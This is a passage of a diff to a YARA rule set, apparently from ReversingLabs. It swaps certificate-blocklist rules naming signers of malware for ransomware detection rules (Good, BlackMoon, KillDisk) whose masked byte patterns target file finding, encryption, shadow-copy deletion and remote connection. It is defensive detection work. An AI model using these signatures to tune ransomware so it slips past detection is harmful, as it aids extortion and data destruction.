?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? + ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 0D ?? ?? + ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 + 45 ?? 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? + ?? ?? 8B 45 ?? 8B 10 FF 12 52 50 8B 45 ?? 8B 10 FF 52 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 50 8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? + 8B 45 ?? 8B 10 FF 52 ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 50 + 8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ?? + E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? + ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 + } + $delete_shadow_copies = { + 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 + 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B + 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? + ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? + ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B + 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? + ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? + ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B + 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? + ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? + ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B + 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? + ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B + E5 5D C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GO ONLINE d.o.o." and pe.signatures[i].serial=="26:91:74:f9:fe:7c:6e:d4:e1:d1:9b:26:c3:f5:b3:5f" and 1586386919<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($delete_shadow_copies) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_523Fb4036368Dc26192D68827F2D889B : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Good : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Good ransomware." author = "ReversingLabs" - id = "bfce2ea9-cbe0-5b58-b7f8-39d2dad28db6" - date = "2023-11-08" - modified = "2023-11-08" + id = "e0f97200-7fe9-5811-b6cd-708ecc3a2fbc" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3884-L3900" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f1886a046305637d335c493972560de56d8186bf99183aed5e2040b2e530fc22" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Good.yara#L1-L82" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6737853a77a6008f9fd2141bb6b13d595f1cb7e832be944596f709e1fcdf8003" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Good" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO MEDUZA SERVICE GROUP" and pe.signatures[i].serial=="52:3f:b4:03:63:68:dc:26:19:2d:68:82:7f:2d:88:9b" and 1586847880<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_84F842F6D33Cd2F25B88Dd1710E21137 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "202593d3-d63a-5852-b680-516504d92031" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3902-L3920" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5aad8e95d1306626b63d767fce4706104330dd776b75c09cc404227863564307" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files = { + FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D + 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E + 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 + C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8B 3D ?? ?? ?? + ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? + ?? ?? ?? ?? FF D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 8B D8 83 FB ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 5F 5E 5B 8B E5 5D C3 + } + $remote_connection = { + 55 8B EC 53 8B 5D ?? 57 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 0F 8B + C1 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4F ?? 83 C4 ?? 8B C1 83 E8 ?? 74 ?? 83 + E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? + ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? 83 F8 ?? 77 ?? FF 24 85 ?? ?? ?? ?? 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ?? + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 83 7F ?? ?? 75 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF + 77 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 FF 77 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 45 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 5E FF 77 ?? 53 68 + ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 + ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5B + 5D C3 + } + $encrypt_files = { + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B C8 8B F2 83 C4 ?? 2B CE 8D 71 ?? + 66 90 0F B7 0A 8D 52 ?? 66 89 4C 32 ?? 66 85 C9 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 8B 35 ?? ?? ?? ?? 47 89 7D ?? E9 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 + 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? + 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53 + FF D6 8B 3D ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? + 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 53 + FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 + 5D C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DataNext s.r.o." and (pe.signatures[i].serial=="00:84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" or pe.signatures[i].serial=="84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37") and 1586775720<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4Fbcaa289Ba925B4E247809B6B028202 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Blackmoon : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects BlackMoon ransomware." author = "ReversingLabs" - id = "d0c4c6c0-d8e3-5efc-a87b-01d1f98a2c18" - date = "2023-11-08" - modified = "2023-11-08" + id = "95ebb6c4-b0c9-5f9a-8424-a2f4d33953eb" + date = "2020-11-11" + modified = "2020-11-11" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3922-L3938" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c41a4f9ccda54b9735313edf9042b831e6eaca149c089f74a823cee6719e1064" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BlackMoon.yara#L1-L70" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "428409096a8637978bf2a1efb3238e4ba87715a909693b0cd26c0f689d567a09" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BlackMoon" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 81 EC ?? ?? ?? ?? 53 8B 9C 24 ?? ?? ?? ?? 55 56 8B 33 57 8B BC 24 ?? ?? ?? ?? 33 ED + 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 76 ?? 85 F6 74 ?? 83 FE ?? 74 ?? 56 FF + 15 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 89 33 74 ?? 8B 84 + 24 ?? ?? ?? ?? 85 C0 74 ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 74 ?? EB ?? 8B 94 24 ?? ?? + ?? ?? 8B 44 24 ?? 85 C2 74 ?? BD ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 74 ?? 85 ED 75 ?? + 8B 84 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 8D 44 24 ?? 50 56 74 ?? FF D7 85 C0 74 + ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 75 ?? 8D 54 24 ?? 52 56 FF D7 85 C0 75 ?? 5F 5E 5D + 33 C0 5B 81 C4 ?? ?? ?? ?? C3 FF D7 85 C0 74 ?? 8B 9C 24 ?? ?? ?? ?? 85 5C 24 ?? 75 + ?? 8D 4C 24 ?? 51 56 FF D7 85 C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 8D 54 24 ?? + 52 E8 ?? ?? ?? ?? 40 50 E8 ?? ?? ?? ?? 8B D0 8D 7C 24 ?? 83 C9 ?? 33 C0 83 C4 ?? F2 + AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 ?? F3 A5 8B C8 8B C2 83 E1 ?? F3 A4 5F 5E 5D + 5B 81 C4 ?? ?? ?? ?? C3 + } + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? + 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? + B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? DB + 45 ?? DD 5D ?? DD 45 ?? DB 45 ?? DD 5D ?? DC 65 ?? DD 5D ?? DD 45 ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B + 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D + ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 + } + $encrypt_files_p2 = { + 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 + 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? + ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? + 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? + ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A + ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? + B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 + DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? + 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kimjac ApS" and pe.signatures[i].serial=="4f:bc:aa:28:9b:a9:25:b4:e2:47:80:9b:6b:02:82:02" and 1588227220<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1F2E8Effbb08C7Dbcc7A7F2D835457B5 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects KillDisk ransomware." author = "ReversingLabs" - id = "cf032593-e742-56d5-a579-3f38a31e2c0c" - date = "2023-11-08" - modified = "2023-11-08" + id = "bd04ac88-987a-58f0-8f0a-508662b3c930" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3940-L3956" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0b446641617d435c3d312592957e19c3d391b0149eafcf9ac2da51e8d9080eb4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.KillDisk.yara#L1-L80" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6148e6fc1363ff8995a9100e07139bfa658c72892db4d30a973bad0f2b3e6c3f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "KillDisk" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ?? + ?? 56 57 33 FF 8B F1 3B F7 89 7D ?? 89 7D ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 + FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 95 C0 84 C0 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8D + 4C 24 ?? 89 7C 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? B8 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 8B 5C 24 ?? 3B DF 8B 44 24 ?? 89 45 ?? 89 5D ?? 77 ?? 83 F8 ?? 0F 82 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15 + ?? ?? ?? ?? 8B E8 3B EF 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ?? + ?? 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 + 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 54 + 24 ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F + 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 4C 24 ?? 51 8D 54 24 ?? 89 7C 24 ?? 52 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 8B C6 05 ?? ?? ?? ?? 50 8B CB 83 D1 ?? 51 + 6A ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 + ?? ?? ?? ?? 8D 4C 24 ?? 51 53 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D B4 + 24 ?? ?? ?? ?? 8D 7C 24 ?? 8D 44 24 ?? F3 A5 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 08 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24 + ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 8D + 74 24 ?? 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 6A ?? 53 50 55 FF 15 + ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 54 24 ?? 52 55 C7 44 24 ?? ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 8B F0 8B 44 24 ?? F7 DE 1B F6 83 E6 ?? 50 83 C6 ?? FF 15 ?? + ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 8B 44 24 ?? 50 BE ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB + ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 8B C6 EB ?? BE ?? ?? ?? ?? 8B C6 EB ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E + 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $app_whitelisting_1 = { + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 32 DB FF 15 + ?? ?? ?? ?? 6A ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B E8 85 ED 89 6C 24 ?? 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? + 51 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 64 24 ?? + 8B 54 24 ?? 3B 54 24 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 85 C0 + 0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1 + 2B C3 C1 F8 ?? 3B C7 0F 86 ?? ?? ?? ?? 3B D9 8B F3 76 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? + ?? ?? 8B 0D ?? ?? ?? ?? 89 74 24 ?? 8D 34 BE 3B F1 B8 ?? ?? ?? ?? 8B E8 77 ?? 3B F3 + 73 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 3B 75 ?? 72 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? + ?? 8B 44 24 ?? 39 06 74 ?? B8 ?? ?? ?? ?? 83 C7 ?? E8 ?? ?? ?? ?? 3B F8 72 ?? 8B 6C + 24 ?? 8B 74 24 ?? FF 15 ?? ?? ?? ?? 3B F0 74 ?? 85 F6 74 ?? 56 6A ?? 6A ?? FF 